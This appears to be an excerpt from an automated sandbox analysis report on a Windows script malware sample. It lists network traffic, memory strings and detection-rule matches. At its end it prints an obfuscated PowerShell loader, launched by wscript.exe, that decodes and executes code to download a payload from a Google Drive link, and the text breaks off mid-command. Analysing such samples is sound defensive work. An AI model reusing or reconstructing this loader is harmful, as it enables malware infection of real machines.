Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: powershell.exe, 00000009.00000002.2003068899.00000000032BF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: wscript.exe, 00000001.00000003.1345209659.00000171D0371000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346641389.00000171D0334000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346068233.00000171D030C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463388260.00000171D0280000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000001.00000003.1346068233.00000171D030C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11a65f450b971 |
Source: wscript.exe, 00000001.00000003.1346468271.00000171D02E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346289034.00000171D02C1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11a65f450b |
Source: powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233D7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.2266575309.0000018923399000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000003.00000002.2266575309.0000018922EAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DRP |
Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DRXR |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download |
Source: powershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.comhP |
Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.2266575309.0000018922882000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: amsi32_8108.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.Commi |